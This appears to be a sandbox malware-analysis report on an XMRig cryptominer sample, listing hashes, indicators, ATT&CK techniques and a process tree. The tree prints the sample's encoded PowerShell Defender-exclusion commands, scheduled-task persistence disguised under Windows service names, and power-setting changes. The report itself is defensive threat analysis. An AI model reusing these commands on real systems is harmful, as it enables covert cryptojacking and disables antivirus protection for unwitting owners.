xmrig | 4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737

Analysis

max time kernel
201s
max time network
182s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
31/12/2022, 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe
Size

243KB
MD5

610b7ec268ce4582941cf56ce7dc29c5
SHA1

4e2f841f102147b5a19bd57fd51d7ba4992812f6
SHA256

4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737
SHA512

e9320c54b27a674fb151f1f1086437dbf1125108dbc406d468e324768054b80e61baf7e3df643cbc866c9b34f30064426e146cf345650fcbfa3fb9715a86b47f
SSDEEP

6144:gLjC/PzqMbqeJLq6xpbEGK+6jI6LIoWD/34qDP9FDCMBRlGFpnXac:gLjC/JLPxpbE5IoW0qbDXrUnXt

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral2/files/0x000600000001ac48-2547.dat	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	vbc.exe

Executes dropped EXE 2 IoCs

pid	Process
4984	dllhost.exe
1912	winlogson.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2452 set thread context of 3836	2452	4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe	67

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4368	2452	WerFault.exe	65

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2108	schtasks.exe
780	schtasks.exe
1760	schtasks.exe
3828	schtasks.exe
1748	schtasks.exe
2212	schtasks.exe
4220	schtasks.exe
428	schtasks.exe
1068	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3836	vbc.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
2324	powershell.exe
2324	powershell.exe
1744	powershell.exe
1744	powershell.exe
3636	powershell.exe
3636	powershell.exe
2300	powershell.exe
2300	powershell.exe
1000	powershell.exe
1000	powershell.exe
1744	powershell.exe
2324	powershell.exe
4984	dllhost.exe
3636	powershell.exe
4984	dllhost.exe
2300	powershell.exe
1000	powershell.exe
1744	powershell.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
3636	powershell.exe
4984	dllhost.exe
2324	powershell.exe
4984	dllhost.exe
1000	powershell.exe
2300	powershell.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe
4984	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
628	Process not Found

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	3836	vbc.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeShutdownPrivilege	2440	powercfg.exe
Token: SeCreatePagefilePrivilege	2440	powercfg.exe
Token: SeDebugPrivilege	4984	dllhost.exe
Token: SeShutdownPrivilege	3920	powercfg.exe
Token: SeCreatePagefilePrivilege	3920	powercfg.exe
Token: SeShutdownPrivilege	4920	powercfg.exe
Token: SeCreatePagefilePrivilege	4920	powercfg.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeShutdownPrivilege	4824	powercfg.exe
Token: SeCreatePagefilePrivilege	4824	powercfg.exe
Token: SeShutdownPrivilege	3772	powercfg.exe
Token: SeCreatePagefilePrivilege	3772	powercfg.exe
Token: SeShutdownPrivilege	3772	powercfg.exe
Token: SeCreatePagefilePrivilege	3772	powercfg.exe
Token: SeLockMemoryPrivilege	1912	winlogson.exe
Token: SeLockMemoryPrivilege	1912	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1912	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2452 wrote to memory of 3836	2452	4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe	67
PID 2452 wrote to memory of 3836	2452	4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe	67
PID 2452 wrote to memory of 3836	2452	4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe	67
PID 2452 wrote to memory of 3836	2452	4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe	67
PID 2452 wrote to memory of 3836	2452	4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe	67
PID 3836 wrote to memory of 5108	3836	vbc.exe	71
PID 3836 wrote to memory of 5108	3836	vbc.exe	71
PID 3836 wrote to memory of 5108	3836	vbc.exe	71
PID 5108 wrote to memory of 4072	5108	cmd.exe	73
PID 5108 wrote to memory of 4072	5108	cmd.exe	73
PID 5108 wrote to memory of 4072	5108	cmd.exe	73
PID 3836 wrote to memory of 4984	3836	vbc.exe	74
PID 3836 wrote to memory of 4984	3836	vbc.exe	74
PID 3836 wrote to memory of 4984	3836	vbc.exe	74
PID 3836 wrote to memory of 5052	3836	vbc.exe	75
PID 3836 wrote to memory of 5052	3836	vbc.exe	75
PID 3836 wrote to memory of 5052	3836	vbc.exe	75
PID 3836 wrote to memory of 5072	3836	vbc.exe	76
PID 3836 wrote to memory of 5072	3836	vbc.exe	76
PID 3836 wrote to memory of 5072	3836	vbc.exe	76
PID 3836 wrote to memory of 4252	3836	vbc.exe	77
PID 3836 wrote to memory of 4252	3836	vbc.exe	77
PID 3836 wrote to memory of 4252	3836	vbc.exe	77
PID 3836 wrote to memory of 1244	3836	vbc.exe	78
PID 3836 wrote to memory of 1244	3836	vbc.exe	78
PID 3836 wrote to memory of 1244	3836	vbc.exe	78
PID 3836 wrote to memory of 3060	3836	vbc.exe	79
PID 3836 wrote to memory of 3060	3836	vbc.exe	79
PID 3836 wrote to memory of 3060	3836	vbc.exe	79
PID 3836 wrote to memory of 4076	3836	vbc.exe	102
PID 3836 wrote to memory of 4076	3836	vbc.exe	102
PID 3836 wrote to memory of 4076	3836	vbc.exe	102
PID 3836 wrote to memory of 4684	3836	vbc.exe	101
PID 3836 wrote to memory of 4684	3836	vbc.exe	101
PID 3836 wrote to memory of 4684	3836	vbc.exe	101
PID 3836 wrote to memory of 3516	3836	vbc.exe	82
PID 3836 wrote to memory of 3516	3836	vbc.exe	82
PID 3836 wrote to memory of 3516	3836	vbc.exe	82
PID 3836 wrote to memory of 5004	3836	vbc.exe	83
PID 3836 wrote to memory of 5004	3836	vbc.exe	83
PID 3836 wrote to memory of 5004	3836	vbc.exe	83
PID 3836 wrote to memory of 4780	3836	vbc.exe	84
PID 3836 wrote to memory of 4780	3836	vbc.exe	84
PID 3836 wrote to memory of 4780	3836	vbc.exe	84
PID 3836 wrote to memory of 3948	3836	vbc.exe	91
PID 3836 wrote to memory of 3948	3836	vbc.exe	91
PID 3836 wrote to memory of 3948	3836	vbc.exe	91
PID 3836 wrote to memory of 3184	3836	vbc.exe	90
PID 3836 wrote to memory of 3184	3836	vbc.exe	90
PID 3836 wrote to memory of 3184	3836	vbc.exe	90
PID 3836 wrote to memory of 4080	3836	vbc.exe	89
PID 3836 wrote to memory of 4080	3836	vbc.exe	89
PID 3836 wrote to memory of 4080	3836	vbc.exe	89
PID 3836 wrote to memory of 3692	3836	vbc.exe	92
PID 3836 wrote to memory of 3692	3836	vbc.exe	92
PID 3836 wrote to memory of 3692	3836	vbc.exe	92
PID 5072 wrote to memory of 428	5072	cmd.exe	104
PID 5072 wrote to memory of 428	5072	cmd.exe	104
PID 5072 wrote to memory of 428	5072	cmd.exe	104
PID 5052 wrote to memory of 780	5052	cmd.exe	103
PID 5052 wrote to memory of 780	5052	cmd.exe	103
PID 5052 wrote to memory of 780	5052	cmd.exe	103
PID 4252 wrote to memory of 1068	4252	cmd.exe	105
PID 4252 wrote to memory of 1068	4252	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe
"C:\Users\Admin\AppData\Local\Temp\4276167ebda9122d2de14422764b45b6f514740bc56c921969c1b39863572737.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2452
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAFEAdgBGAGcAbQB5AEsAdgBPAGcAdgBYACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBzADQAWgAxAFMANgB1AGcAQQB0AEoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMAA0ADQAaAByAG0AMwBIAGcAYQBnAHUAOABaAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMQBrAGoAQwBRADgAaQBvAEoAMQBaADgAdQAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5108
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAFEAdgBGAGcAbQB5AEsAdgBPAGcAdgBYACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBzADQAWgAxAFMANgB1AGcAQQB0AEoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMAA0ADQAaAByAG0AMwBIAGcAYQBnAHUAOABaAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMQBrAGoAQwBRADgAaQBvAEoAMQBaADgAdQAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4072
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4984
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:3580
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2492
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4752
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:3832
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:3228
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo Чu5Gъи8фКxРvU & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Ъ5ПИФ
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:780
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo BKAnEВГэй2Y & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo C2lЧЭюEXOKZТпзпФ2v
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:428
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ЫrГ4лМSbтЖШmRЕМСЧzЛ & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo rт5GЭРD8эE
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo DO2гН1Б3Бхье7кxixэа & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo оноВrчгкУтАQ7
    3⤵
    PID:1244
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo зЕДEuеМУДМ0yЬюбЩfЩh & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo OмяхZnР6эHм
    3⤵
    PID:3060
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2108
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo lоGer7ГPж & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo M
    3⤵
    PID:3516
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3828
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjACoENABqAC4EcQA1AFkAagBPBEwERAQ7BG0AcwASBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATQApBG4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADQARAAVBBEEMQBaACkEQwAjAD4AIABAACgAIAA8ACMANQBKACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBE4AaQB6ABMEbgB6AFYANgQ3BCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBVAGcAMAQvBBEEMgRCBGMAKwQRBBAENQRLBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwANwRMBDsEdgBpAEIAMwBiAB4EHQQjAD4A"
    3⤵
    PID:5004
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjACoENABqAC4EcQA1AFkAagBPBEwERAQ7BG0AcwASBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATQApBG4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADQARAAVBBEEMQBaACkEQwAjAD4AIABAACgAIAA8ACMANQBKACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBE4AaQB6ABMEbgB6AFYANgQ3BCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBVAGcAMAQvBBEEMgRCBGMAKwQRBBAENQRLBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwANwRMBDsEdgBpAEIAMwBiAB4EHQQjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADYESgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMQQVBB8EMQAwACcEKQQ3ABcEPwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMwAyAEQEHwQdBDYAIwA+ACAAQAAoACAAPAAjADgEPQQ4ADEEOQA5BEQELQRlACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBzABsEIQQyABcERQBHAGwAOwR3AEYAcwAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMARgAXBEgEGgQVBGEAMABiAC4EMARxAEUEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcQAuBEsAVgAlBDkAGwRsAFAALQRNBCMAPgA="
    3⤵
    PID:4780
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADYESgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMQQVBB8EMQAwACcEKQQ3ABcEPwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMwAyAEQEHwQdBDYAIwA+ACAAQAAoACAAPAAjADgEPQQ4ADEEOQA5BEQELQRlACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBzABsEIQQyABcERQBHAGwAOwR3AEYAcwAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMARgAXBEgEGgQVBGEAMABiAC4EMARxAEUEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcQAuBEsAVgAlBDkAGwRsAFAALQRNBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3636
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjABQEbQAzAEQEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA6BD8EJgQ8BBUENwQ1BCYEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACMESgRBBGEAQQRQADQAFgQaBCoERgRGAFUAdwB3ACMAPgAgAEAAKAAgADwAIwBCADcAVwB1AFAAHgQcBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBHQALQRVAEMEQwBvABUEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAFoAIwRlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAIwRSAEIEEQRPAEsEbABBAHMANABKBFIANwQjAD4A"
    3⤵
    PID:4080
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjABQEbQAzAEQEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA6BD8EJgQ8BBUENwQ1BCYEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACMESgRBBGEAQQRQADQAFgQaBCoERgRGAFUAdwB3ACMAPgAgAEAAKAAgADwAIwBCADcAVwB1AFAAHgQcBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBHQALQRVAEMEQwBvABUEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAFoAIwRlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAIwRSAEIEEQRPAEsEbABBAHMANABKBFIANwQjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEUAIgRYAE0APAQaBDIEagBKABIEUwA0ABkEFAQfBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAIARzAHgAGwQWBDUESQBLBFIAUgAqBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAZBGYAHwQcBFoAPQREAFAASQQjAD4AIABAACgAIAA8ACMAcgBGBEoEbAB3ABkELAROBEEAVQAfBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwByABUEOgQpBGsAQgQ8BBMEGARTACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBoAFAARQARBFkAZgBBAE0ESARxAEIAYQBPBE4AJQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA1BD8EMgRyADYATwQjAD4A"
    3⤵
    PID:3184
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEUAIgRYAE0APAQaBDIEagBKABIEUwA0ABkEFAQfBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAIARzAHgAGwQWBDUESQBLBFIAUgAqBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAZBGYAHwQcBFoAPQREAFAASQQjAD4AIABAACgAIAA8ACMAcgBGBEoEbAB3ABkELAROBEEAVQAfBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwByABUEOgQpBGsAQgQ8BBMEGARTACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBoAFAARQARBFkAZgBBAE0ESARxAEIAYQBPBE4AJQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA1BD8EMgRyADYATwQjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1000
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADAEeQBRAB0EcwBLAEsASQQVBEMAFAQnBEIEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAtBDAEPAR0AEoAKQQSBHUAbgBHACgESABSACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBGADYELQQbBB8EFgR1ACgEawBDACsEUAAjAD4AIABAACgAIAA8ACMAYgAgBBQEbABSADYEYgA3BEsAVwB3AD4EEgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMANQBsAGsALAQfBCcEPQROAG8ATABiAGgAEwQ0BG8AIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADgATAAhBCIEJARJAHkAdgA1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFEAeAAYBEoAGQRIAGMALQQ8BDgEIwA+AA=="
    3⤵
    PID:3948
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADAEeQBRAB0EcwBLAEsASQQVBEMAFAQnBEIEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAtBDAEPAR0AEoAKQQSBHUAbgBHACgESABSACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBGADYELQQbBB8EFgR1ACgEawBDACsEUAAjAD4AIABAACgAIAA8ACMAYgAgBBQEbABSADYEYgA3BEsAVwB3AD4EEgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMANQBsAGsALAQfBCcEPQROAG8ATABiAGgAEwQ0BG8AIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADgATAAhBCIEJARJAHkAdgA1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFEAeAAYBEoAGQRIAGMALQQ8BDgEIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2300
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo r & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo вАпEFгZkYшь
    3⤵
    PID:3692
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2440
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3920
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4920
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4824
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3772
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo рч3СмШНСяhJДлАmQЪ & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo л
    3⤵
    PID:4684
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo hуСZtСц & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ь
    3⤵
    PID:4076
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1760
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 236
  2⤵
  - Program crash
  PID:4368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
